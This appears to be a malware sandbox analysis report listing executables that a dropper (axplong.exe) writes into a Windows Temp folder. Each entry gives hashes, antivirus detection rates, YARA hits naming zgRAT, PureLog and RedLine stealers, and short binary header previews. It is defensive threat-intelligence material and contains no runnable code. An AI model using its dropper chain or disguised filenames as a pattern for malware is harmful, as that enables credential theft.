Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................8.....L.............@...........................A..................@..............................x"... ....7..................`..@............................P......................................................CODE................................ ..`DATA.... -..........................@...BSS......................................idata..x".......$..................@....tls.........@...........................rdata.......P......................@..P.reloc..@....`......................@..P.rsrc.....7.. ....7.................@..P..............A......JA.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000254001\penis.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	506368
Entropy (8bit):	5.884711667889521
Encrypted:	false
SSDEEP:	12288:G0Rr0R4h0h0mh0nzh02wy53Ih09s6MZEBe1SxHyVSSqDa7HV:BMuBe1MHyVSSqDa7
MD5:	6760374F17416485FA941B354D3DD800
SHA1:	D88389EC19AC3E87BC743BA3F8B7C518601FDBF9
SHA-256:	9DC31FBD03DA881700908423EB50C6B0C42C87FEC28E817449D3DD931802C9F5
SHA-512:	6E4D2F17CB93FE831198C2EAA35BF030D6A06D620645D3E1452C6BD6E77E42BAA9DC323FD60A2C5AE1D89124ADDE69972C489739D4BD73BA01B95B829A777EAB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(...............0..>...z......>\... ...`....@.. ....................................@..................................[..K....`...v........................................................................... ............... ..H............text...D<... ...>.................. ..`.rsrc....v...`...x...@..............@..@.reloc..............................@..B................ \......H.......4S..............8...................................................(....(......(......(.....0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~....(.....%..G~....(.....%..H~....(.....%..e~....(.....~....(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~....(....o........9......I~....(.......8C........~....(....o....:......{....~....(....8......{....~....(.........(..........

C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	464896
Entropy (8bit):	5.410841803375821
Encrypted:	false
SSDEEP:	12288:QeeeeVeeeeeegeeKVe3zJQX7MHv+xY2DxDdeeeeVeeeeeegeeKVZ3zY:QeeeeVeeeeeegeeKVe3zJ7QdeeeeVeeq
MD5:	37D198AD751D31A71ACC9CB28ED0C64E
SHA1:	8EB519B7A6DF66D84C566605DA9A0946717A921D
SHA-256:	1ED4A8B4C74AAB435EA5CD459D5AC961E5A8CA28924801BD84D336135F30EFDE
SHA-512:	60923C0A8CE5FD397D49749CCEE68CA3FE294D7323551CE9755410AC16BFFF56A35BEE3E6B9A67D57CDFCB43E4F164712F33CD255B76689174DCF4C475976C96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..L..........vk... ........@.. ....................................`.................................$k..O............................`.......i............................................... ............... ..H............text...\|K... ...L.................. ..`.rsrc................N..............@..@.reloc.......`......................@..B................Xk......H.......(6...,...........b..0............................................0..I........~....}.....(.... ....(.....(.... <...(.....{....r...po...........o....&....0...........('..... .u.5C. .w)F5.. C..6;..... .w)F.}8M.... .d?^;..... c...P. .u.;....8.... .O..5.. .np.;..... .O...v8..... R,...W. ..G.;..... B.J../8.....r...p(....:....8.....r'..p(....:....8.....r-..p(....:....8.....r5..p(....-t8.....r9..p(....-h8.....rC..p(....-\+x.rM..p(....-S+i.rU..p(....-J+Z.r_..p(....-A+K.rg

C:\Users\user\AppData\Local\Temp\1000285001\2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	689664
Entropy (8bit):	6.8668413422174535
Encrypted:	false
SSDEEP:	12288:lht5Z3o/mPatX0hz6hWIShEYZUuWygFYK1hsHyLMLH/KweErse7K4m6o/OGSew/X:lht5Z3oCadeb
MD5:	B859D1252109669C1A82B235AAF40932
SHA1:	B16EA90025A7D0FAD9196AA09D1091244AF37474
SHA-256:	083D9BC8566B22E67B553F9E0B2F3BF6FE292220665DCC2FC10942CDC192125C
SHA-512:	9C0006055AFD089EF2ACBB253628494DD8C29BAB9D5333816BE8404F875C85AC342DF82AE339173F853D3EBDB2261E59841352F78F6B4BD3BFF3D0D606F30655
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................z..........n.... ........@.. ....................................@.....................................W....... ............................................................................ ............... ..H............text...ty... ...z.................. ..`.rsrc... ............\|..............@..@.reloc..............................@..B................P.......H.......(...........J...................................................D...>n..8...2..ax...^s(O.L.~.g..?....M6...;.u....=.k.d..w-X^.k\|..e..Qv.i..".n......s.W..Dl.\s.U..v..CEix.1...G....5..eM...k..[..wx1..).w..._...Tp...2F..S..U.@.6...'..qB.]O...R..0./....ES_{\|..H.?...<.w.....m...f.T..e._.l.g...']..^...u..lC......{..d0...s.G....Fo.....vt.L2k\|w...Sr...B.1.Y2.W".....,.}....7.c..^........H.....p.!U...g.M7.m.......OG1......Is.>....?pEH....rO....:\....].

C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1381143
Entropy (8bit):	7.942673979265856
Encrypted:	false
SSDEEP:	24576:b9yEBs1ZKaxv6rRVO9VdLCjJehm4v2TeLUzguXpdQhgRQ7SoYafkW:bxqZK66rb4V0cxtQzv5dQhgRQ7SxID
MD5:	2B01C9B0C69F13DA5EE7889A4B17C45E
SHA1:	27F0C1AE0DDEDDC9EFAC38BC473476B103FEF043
SHA-256:	D5526528363CEEB718D30BC669038759C4CD80A1D3E9C8C661B12B261DCC9E29
SHA-512:	23D4A0FC82B70CD2454A1BE3D9B84B8CE7DD00AD7C3E8AD2B771B1B7CBCA752C53FEEC5A3AC5A81D8384A9FC6583F63CC39F1EBE7DE04D3D9B08BE53641EC455
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%46%46%46,R.6&46,R.6446%56.46>..6+46>..6$46>..6$46Rich%46........PE..L.....GO.................p....>..B...8............@...........................G......&....@.................................4........0G..r....................?.H....................................................................................text....o.......p.................. ..`.rdata..b.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc....r...0G..t..................@..@.reloc...2....G..4..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	321536
Entropy (8bit):	7.984064781404801
Encrypted:	false
SSDEEP:	6144:/6ZNaeEuexVOkKu/A9UZMOqMVr57KLMLPQ5uRXg6hUm8:/BvOkHPEUsYLeIXgDm8
MD5:	FF5AFED0A8B802D74AF1C1422C720446
SHA1:	7135ACFA641A873CB0C4C37AFC49266BFEEC91D8
SHA-256:	17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
SHA-512:	11724D26E11B3146E0FC947C06C59C004C015DE0AFEA24EC28A4EB8145FCD51E9B70007E17621C83F406D9AEB7CD96601245671D41C3FCC88A27C33BD7CF55AC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f................................. ........@.. .......................@............`.....................................W............................ ......\|................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H..........................................................................h7....c73..w..V)J.:..a.W'.=.\|...Q&.....p....IIoO...g...Q...P.~CM...v@.P..Sl....a=..:u?ED."..Jp....2..r.B..H...?.v..0]2.....>..F.}.s6..N...h.#.....Z.6..g^gu.aW&.2.n?.v...S...}.!.^..E.h.dp.....fc4{../O..I....v.Q,U...>xK..c.D.../..E7...T...t......y...f..SC....).F.m."2...Ms.3"KL.e..zc.Bb.-.l.\......TYQ..B!.......?.......e]4...../(5......5...4.......'.[.g$.....gb;e..Q..r.Ge(a<..qC.J

C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	360448
Entropy (8bit):	6.667690093536603
Encrypted:	false
SSDEEP:	6144:yEIbJdhhk012D9kEsrwRdvwoShfvM4MH0RoeAcGho33vXvIKgI5TdFaA51TIrxLD:yEIbJvhk0azddWtyA51C09ssEN8mhGfp
MD5:	2F1D09F64218FFFE7243A8B44345B27E
SHA1:	72553E1B3A759C17F54E7B568F39B3F8F1B1CDBE
SHA-256:	4A553C39728410EB0EBD5E530FC47EF1BDF4B11848A69889E8301974FC26CDE2
SHA-512:	5871E2925CA8375F3C3CE368C05EB67796E1FBEC80649D3CC9C39B57EE33F46476D38D3EA8335E2F5518C79F27411A568209F9F6EF38A56650C7436BBAA3F909
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...<..f..........................................@..........................@............@.....................................x................................H...................................................................................text.............................. ..`.rdata...).......*..................@..@.data...X........^..................@....reloc...H.......J...6..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10796768
Entropy (8bit):	7.884437457246237
Encrypted:	false
SSDEEP:	196608:I7A71NIOC732QZMymBHd+3WGeFdJJMGHPP/CPZ5za/+qKcDxNY5fv7RFHnTKm:IA5NIOC73RdmB9+ReFV/m5zQAfHHTF
MD5:	489F9C4FC0AFA8D1BE37BC5E2F57833B
SHA1:	C2BAC602A73C19B345B64E0B7CF2F837BE307B61
SHA-256:	D9DBFBC8294CBF6A32D43413ED328594EE058D7356C26EB5CD196F9F4867C078
SHA-512:	7F43D972F58A025D09143C57351221FE7B10C1756A0C5578AC42698C21EA05986D4BBC0C7FF4BE339C2D0930B505E4F4DDA53C0800D84B059A21BE938ADB678E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].g...................N...T.....~.O.. ... O...@.. .......................`......e)....@.................................0.O.K....@O.V.T.................@........O.............................................. ............... ..H............text.....N.. ....N................. ..`.sdata....... O.......N.............@....rsrc...V.T..@O...T...O.............@..@.reloc.......@.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000321001\2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6600874
Entropy (8bit):	6.623257126100034
Encrypted:	false
SSDEEP:	49152:vrQMi0TVaIf0qzqiL9W8vy7GsDW0NtRN5moshpmxHDDcznoGLSctQ7HUCDjQlOlZ:voAjYD1mOfc7FSctSHU0jQlOl/iS5w6
MD5:	CC4200197F1A0D06603CB47B59F1362B
SHA1:	20C0D508071AEC082BF246EA6D43550210817ABE
SHA-256:	7FBF48D0029650B48AF23FA6D7D02CD783CDF679E369EA43A7040C8F3DBB6015
SHA-512:	9E8FA1A1BD596747E9E614D03D48D056D534EC8ECF82897B53477EDD70D6F77DE9EA30F72B9D140D4804EE364AAA3F67B8F0215FE04FFC32C51DB9A9BA2E5E6C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.x^..%.........#.jG...Y...f...........G...@..................................+e....... .........................B..................................................................T'H......................................................text...4iG......jG.................`.P`.data...H.....G......pG.............@.`..rdata..x.....G.......G.............@.`@/4......$....@H......&H.............@.0@.bss......f...K.......................`..edata..B.............K.............@.0@.idata................K.............@.0..CRT....4............K.............@.0..tls.................K.............@.0..reloc...............K.............@.0B/14...................Y.............@..B/29..................Y.............@..B/41.....XL.......N....[.............@..B/55.....B.............[.............@..B/67.....T.............\.............@.0B/80.....a.... ........\.

C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082545442352462
Encrypted:	false
SSDEEP:	3072:Eq6EgY6iArUjOvWUJwPYT8QADFKoRJTA+tJSiK1cZqf7D34leqiOLibBOT:vqY6iULwP/xnRJTAKJ81cZqf7DIvL
MD5:	58E8B2EB19704C5A59350D4FF92E5AB6
SHA1:	171FC96DDA05E7D275EC42840746258217D9CAF0
SHA-256:	07D4B7768E13D79AC5F05F81167B29BB6FBF97828A289D8D11EEC38939846834
SHA-512:	E7655762C5F2D10EC246D11F82D437A2717AD05BE847B5E0FD055E3241CAACA85430F424055B343E3A44C90D76A0BA07A6913C2208F374F59B61F8AA4477889F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5492542
Entropy (8bit):	7.933542408650758
Encrypted:	false
SSDEEP:	98304:MVZklJQyhAl9gN4sldQzfC6lmzlt6yvi0WcHlPLeqNZ8hY/bUZqTxQeeBxZAsSHf:S0vOl5zqv/6H0XlPKQ8hY/b0qlteXqsF
MD5:	E277DBB7AFA4631D4ABCEF9183671836
SHA1:	71EF01646FA13B0A49550283D5BE12539526C724
SHA-256:	3A72E66E73B857A6E2E004CFA4E6EF4EFA872AEDF7941E94637BF74B5591DEB3
SHA-512:	E9DE17DB72EF4DB18615E411823A2D6A3BB8AB870B508DEFCCA8045F75C1D89F52EF7F3A9B1BC957DAD1311EF0BFB2F1A0D411F82FA3F596F1FEFB6B48F8B770
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..........^.......\|............@.................................P.T...@.....................................d.......)....................p.........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...)...........................@..@.reloc.......p.......\..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	986112
Entropy (8bit):	7.987134427472388
Encrypted:	false
SSDEEP:	24576:6MGVJ/Oap+Bh45LEwaV1QghDHm5GQTSmGg:6NJ/jpi5waVhjm5GQ2m7
MD5:	1EF39C8BC5799AA381FE093A1F2D532A
SHA1:	57EABB02A7C43C9682988227DD470734CC75EDB2
SHA-256:	0CCED5B50789FCA3AD4B2C151B798363D712DA04C377BD704DCEF4898E66B2B4
SHA-512:	13A9C267C4CEB2BD176F1339FAA035FFEB08936DEEEB4E38252EA43CFE487EA1C1876E4CC2A965548E767AF02805A1DA62885E6538DA056BE0C6FAE33B637682
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'1.f.............................!... ...@....@.. ....................................`.................................(!..W....@..`....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................d!......H.......P....G...........U.............................................."..(.......>..(.....oV...&.s..........0..........(.........(....o....3.(....-..j~....%..(....~....o.......j@8...(......s.......o........&..o ...s!.........o".....,...i-....,...o#....($.....o%...o&...o#........(....(......(..........c.o'.......o'........c.o'.......c.o'.......o'........c.o'........c.o'........c.o'....o(......j....+)....o)...nX.....bX.....da.....o*......X......3....bX.....da.....bX....!.

C:\Users\user\AppData\Local\Temp\1000343001\5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	153485312
Entropy (8bit):	2.996715171813733
Encrypted:	false
SSDEEP:	196608:M6w14M5FEW9izuHCeCF/JGCNfMxFE5umE5N6HPu/x9/Ckg8Lng:7w14SfIzuHVCzGUS1JnT/P/1bLn
MD5:	3F55FA60CF0DE16BD6FDE091F50D17F0
SHA1:	39ACD4314FFC901FBD9396ED2602D448A84B9BED
SHA-256:	5DBF58D575DAEBB253C692B15F5A55E8D50ECECBCA8D04306D833E80828A894D
SHA-512:	3E5650D2CBBB4084CDBF56D70B74A2502FD3EC1A4BFD242D4D45912137F14C38260CE70A3745668A3ABDBF2058EC85AF3B7051C3A4FE6BDD4D14CF9055434E67
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.6[..f.................@.........................................`... .........................................N.......8.......zR....y.d............@..`.............................y.(.......................P............................text....5[......6[.................`.``.data........P[......:[.............@.`..rdata.............................@.`@.pdata..d.....y.......y.............@.0@.xdata..`....P......."..............@.0@.bss.........`........................`..edata..N............0..............@.0@.idata..8............2..............@.0..CRT....p............H..............@.@..tls................J..............@.@..rsrc...zR.......T...L..............@.0..reloc..`....@......................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1925120
Entropy (8bit):	7.949669975421745
Encrypted:	false
SSDEEP:
MD5:	CB1A17EFDA5BE9D8D7CE9FE5903812DA
SHA1:	D1B00BB0B02D27538ECA9A2788F84E93CEC9CF78
SHA-256:	D558E3E2AFE0BBFA36AE7020C052E1A0077C45E172D643E8F0AF0AA617C35875
SHA-512:	A000E40DDCC6033E1962D3528881268321BAC6E6681CA98EC4C6CEFD5F20D0D574ED2092DC8B14B9B7FBECEEA0FC9DE5B4649A17112FBAAA8C16F9D092368369
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................pL...........@...........................L...........@.................................W...k............................SL.............................8SL..................................................... . ............................@....rsrc...............................@....idata ............................@... .`+.........................@...ifufhtja.P....2..F..................@...wxnzvpao.....`L......:..............@....taggant.0...pL.."...>..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\607698\Q

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	813963
Entropy (8bit):	7.999769507096853
Encrypted:	true
SSDEEP:
MD5:	7B5632DCD418BCBAE2A9009DBAF85F37
SHA1:	32AAF06166854718F0BCBB2F7173C2732CFB4D33
SHA-256:	361E9C3B62719B79BC280420B5F710E160FD55F2250BF605911DED7162483DB4
SHA-512:	C834E90CCF2D35529C294319B8E9A49DB7A7D67D0567E0739131D5AF51170DB32076D68147DC101F8047A75CB5B2275B25A9C8346A99A146A6798B9764316838
Malicious:	false
Reputation:	unknown
Preview:	\.;..'...$....v....F..Bas.H.>}.....w....#}3.t............p..P.<....3..-r\......(B...?.Z1..`..h0.8.......<.+^..u....WR......:..~t...J7j..k.U.;.n_Y...^...Z..So..U...(..m...I...:b..T<.@V.s....uW.....0)I.u.s..5..W...oB.Z.=U.!.....s1^It......S...e..+O.... .Q..3.(.....R.....V..W......\{y.l.+Y.%..zF......!N.]_.j..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R\|...F.:.'.F...h..................p.4.....p.4kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.W..,P..Myn.2..t.W.........&...q....... .4.....p.4m........px.5...x..2).U.j....>.p#...w..=......h?.X..B=...E..r.c...G=.g.E...'.t...+.._...[(.....Xo...9.H..)a.`.x>.........o..I..0..W.(.];EHV..d.U....^E.2.wM.D'r..z......9.

C:\Users\user\AppData\Local\Temp\607698\Waters.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Asbestos

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.996968538256275
Encrypted:	true
SSDEEP:
MD5:	19121D99734080F4FDD9CA3008168360
SHA1:	B00ACBDD3FA952DF781CA9AD5C86DED9F2D51EC6
SHA-256:	37576E4B3A1E0004B4CF7DA625B865A62D895411ED157C538F5F4CD3AA6FAB7A
SHA-512:	E2E863D19E2F560C1DEB018C3C2748BE170B11FCB520ED7E7EA20727646BCACB0B5C3ED04E856943C67E51F5083C90AA3DD1F8794A83901A203C8BAC4FA51C92
Malicious:	false
Reputation:	unknown
Preview:	....@2...../.7..F..YDHt....C<....o.KEq.`.J&..[7T......k....IhIh.\....\|Lw~..X.....$<............^....o..yHe.%].dl.B...=.>Y+y.+O..7q<.c.S.h...?&.k..4.Ds5..c.GP.....x.l\|]6.Q..&v.k...F..._.......eX).+..I..2or..wG..jJS.......M.....VI...." ..z..{.0.t-tQ.)..&..ty.)..^.!........V$o9_. .t..9.@.k..YM...^.]YS..\.I.b...!..0q\|.3....p...A.w.(P.<.....A..-..r.&.t.e..U..N...........H,.+tY......V..3.....................=....1.......uj'6.........`h.....nR.m..U......y...)......4(.O....L..[....{a1!..Y?.._:.5...T\.j~...J..$r1.M/....x.7....?..%}.L9..^.!AX..6.D...\|.aG.3..2E.KEB.l..O...n..\...Pe.d....~.)...H.Q.qUp....(....e.^..u....4.@.H.?..tE.W..N...r.bk...y...y....z......Osv.P.4.^...9.O.wx._.d.M....k..drp...f...I........B...Z>l...!..I...V..-.g=...H..6.~.. y..j),..n.....q;).?7.~p...2z?5x../"S.&B..t...!.(.sk.JD..SR..s..^.h.....R....yJ....w..JI.+[....S..o}A...%..Uf...S..../.U.f........d.8k.b?....QM.....+#..n.......I..h.:.*..!N...f.;....Un.8zi .Xr..o..N.....

C:\Users\user\AppData\Local\Temp\Ashley

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	7.996628085071258
Encrypted:	true
SSDEEP:
MD5:	E522956891659C41BD8550B8D5E16231
SHA1:	4380C8A0C30DB1532728CDB72707F9F1847CC87D
SHA-256:	DDB7F60AB5F8957955DD20F2DC270E3EF833D3727F374A8C4C444634BD05609D
SHA-512:	35C81EF1A2C040DBD52CAD9F38FDA43D8836D955B62E478AE941A4BA67D297DC1C4B40D6B30959C5D2F784D5CB0D19C795307906D52AD0E7EB72BD0E4235172F
Malicious:	false
Reputation:	unknown
Preview:	....4..u.(..7.w..(Ur.7..H......=\|m.4X;..~^.SoU...x..ob.;....u......j.........>HU2jQ...]6.........5.......-6.!2~..w..\...Y.R<.N.%..d8q6.b........B.kd.z...1.._..^....~P.=VI...<..C.'."....i"...K9:.._.gq.F.0.'..P.U..".m.[=u.r.<...[..."...l.>.TO.t.rv..]....Z.N.....$....d#;...o.".?......f.....q.....W...Ei.#..EwE..~....r..=....C......A.B...\S....x}.....i\ <-.3..Q.....^.....%H.Izk......./+w...5......d..Lt<@....8..!..3:.AM.r.H..!......w.G.PT.......1..-...".U...G.t...`.N....f_..9.m..!lT....G.:M..............P-...&..iY.8w.^$..2/.:.,...G....f...')...N?..~.......Qo\|.d.fj....T..?.0.n.......XZ. +,t.m.`^...o...&..........c..M..Eb....`.......m)..'.@..-]..).......jB...4.x.Q.\....P^d....GW.kB.\|.{...x......AGG..jUi........$G..1oP.%M...x\Z..A..k.....%..s".....6.^..:.e.\mo.E...o.Ww...}.mo..C...............R...0..oL9.l.;[.4\|..h.......&./...../9hn.$....d4.J.Lj.5..u.bB.....u.n...S.......v58.0.p.!....(k....e.G7P4R...A....-..v/....Y.......&<...~.....2y..O!.

C:\Users\user\AppData\Local\Temp\Bet

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	7.996845407128512
Encrypted:	true
SSDEEP:
MD5:	0F3F07B667E947C4DA38813D6D651E2A
SHA1:	692622D5E5705F8F65DB96F70D8C7C2F7FD5A640
SHA-256:	32B3D9D5BC58659EA524AA2CABD9CFC81B73E679E3D2CC899DFB00439612F5FF
SHA-512:	449AB13DD860B08570C589DC24E468DD880434C3BE774BA4F078D8F116D710326FC546DE621DCE8A27E134F70F651D44642EC0ECE37375332A7D7725E9DDCF9C
Malicious:	false
Reputation:	unknown
